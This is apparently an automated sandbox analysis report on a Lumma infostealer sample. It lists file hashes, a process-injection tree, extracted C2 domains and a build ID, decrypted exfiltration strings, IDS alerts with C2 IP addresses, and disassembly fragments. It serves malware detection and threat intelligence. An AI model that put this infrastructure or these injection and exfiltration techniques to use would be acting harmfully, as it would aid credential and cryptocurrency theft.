Edit tour

Windows Analysis Report
klFMCT64RF.exe

Overview

General Information

Sample name:	klFMCT64RF.exe renamed because original name is a hash value
Original sample name:	6275fdc6cb613300c08ef09917a6dcd2da5eb1fef5e20bdd214fd9fefeafd8fb.exe
Analysis ID:	1524041
MD5:	0732fc7323424a121f9aa2a8d7001039
SHA1:	100f9cde038c5f5d31edd74d13a665c3f36553bb
SHA256:	6275fdc6cb613300c08ef09917a6dcd2da5eb1fef5e20bdd214fd9fefeafd8fb
Tags:	exeGuizhouSixuandaTechnologyCoLtdsigneduser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

klFMCT64RF.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\klFMCT64RF.exe" MD5: 0732FC7323424A121F9AA2A8D7001039)

BitLockerToGo.exe (PID: 4396 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abnomalrkmu.site", "snarlypagowo.site", "questionsmw.stor", "treatynreit.site", "absorptioniw.site", "chorusarorp.site", "soldiefieop.site", "nurserrsjwuwq.shop", "mysterisop.site"], "Build id": "c2CoW0--fart1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2259734292.0000000002BEC000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:10:57.427135+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49716	188.114.97.3	443	TCP
2024-10-02T15:10:58.378602+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49717	172.67.208.141	443	TCP
2024-10-02T15:10:59.368455+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49718	188.114.97.3	443	TCP
2024-10-02T15:11:00.404803+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49719	104.21.56.150	443	TCP
2024-10-02T15:11:01.532459+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49720	104.21.84.18	443	TCP
2024-10-02T15:11:02.551580+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49721	172.67.183.74	443	TCP
2024-10-02T15:11:03.859116+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49722	104.21.21.3	443	TCP
2024-10-02T15:11:05.776615+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49723	104.21.17.174	443	TCP
2024-10-02T15:11:08.192824+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49725	172.67.209.193	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T15:10:57.427135+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49716	188.114.97.3	443	TCP
2024-10-02T15:10:58.378602+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49717	172.67.208.141	443	TCP
2024-10-02T15:10:59.368455+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49718	188.114.97.3	443	TCP
2024-10-02T15:11:00.404803+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49719	104.21.56.150	443	TCP
2024-10-02T15:11:01.532459+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49720	104.21.84.18	443	TCP
2024-10-02T15:11:02.551580+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49721	172.67.183.74	443	TCP
2024-10-02T15:11:03.859116+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49722	104.21.21.3	443	TCP
2024-10-02T15:11:05.776615+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49723	104.21.17.174	443	TCP
2024-10-02T15:11:08.192824+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49725	172.67.209.193	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.klFMCT64RF.exe.2880000.1.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["abnomalrkmu.site", "snarlypagowo.site", "questionsmw.stor", "treatynreit.site", "absorptioniw.site", "chorusarorp.site", "soldiefieop.site", "nurserrsjwuwq.shop", "mysterisop.site"], "Build id": "c2CoW0--fart1"}

Multi AV Scanner detection for submitted file

Source: klFMCT64RF.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: absorptioniw.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mysterisop.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: snarlypagowo.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: treatynreit.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chorusarorp.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abnomalrkmu.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: soldiefieop.site
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: questionsmw.stor
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: nurserrsjwuwq.shop
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String decryptor: c2CoW0--fart1

Source: klFMCT64RF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: klFMCT64RF.exe

Static PE information: certificate valid

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.74:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.5:49725 version: TLS 1.2

Source: klFMCT64RF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0044DD80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000088h]	2_2_0043704A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0043704A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_00436067
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_00436067
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, dword ptr [esp+0Ch]	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0043600B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0043600B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_004160FD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	2_2_00448150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	2_2_0044E1B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_00422210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043E220
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi+25h]	2_2_00408230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	2_2_004212DB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push eax	2_2_0044A2E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]	2_2_0044D2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044D2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_004162A7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_0042A2AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, ecx	2_2_004162B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_004162B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	2_2_004162B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, dword ptr [esp+0Ch]	2_2_004012BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	2_2_0044E330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	2_2_004293D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]	2_2_0044D380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044D380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_00429440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00433430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	2_2_0044E4A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	2_2_0044E4A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp ah, 0000002Eh	2_2_0042F4B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_0042F4B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0042F4B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, ecx	2_2_004162B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_004162B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	2_2_004162B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	2_2_0040F5D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004235D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_0042A5E8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_0041B580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0043665F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0043665F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push 00000000h	2_2_00403670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00413671
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00413671
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0042261A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	2_2_00405630
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	2_2_0042E6DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]	2_2_0044D680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044D680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	2_2_004296A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004296A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	2_2_0044C780
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004357A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004357A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004137B2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004137B2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004137B2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 07E776F1h	2_2_0042B820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0042B820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [00456158h]	2_2_0042B820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004358E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044E890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]	2_2_0044D8A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044D8A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_00435908
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_00435908
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	2_2_004479D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	2_2_0041698C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044D9A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h	2_2_0041EA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 07E776F1h	2_2_0041EA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]	2_2_0040BA00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 07E776F1h	2_2_0042BA04
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0042BA04
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00406B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], ax	2_2_00422B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_00433B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	2_2_0040FB30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	2_2_00448BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	2_2_00435C4E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	2_2_0044BCE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00426D50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	2_2_00415D94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, ecx	2_2_00415D94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_00415D94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	2_2_00415D94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0044CE0F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000690h]	2_2_0041FEC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp eax, C0000004h	2_2_0041FEC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]	2_2_0044CEC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044CEC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0042AED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0042AED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_00444EF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	2_2_00409E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebp, eax	2_2_00409E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001B8h]	2_2_00412E83
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	2_2_0044BF00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000690h]	2_2_0041FF04
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_00422F33
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_00433FF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	2_2_0042EF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	2_2_0042EF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [edi]	2_2_0042EF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0042EF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]	2_2_0044CFB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0044CFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49725 -> 172.67.209.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49725 -> 172.67.209.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49722 -> 104.21.21.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.21.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49719 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49719 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49717 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49718 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49718 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49723 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49723 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49720 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49720 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 188.114.97.3:443
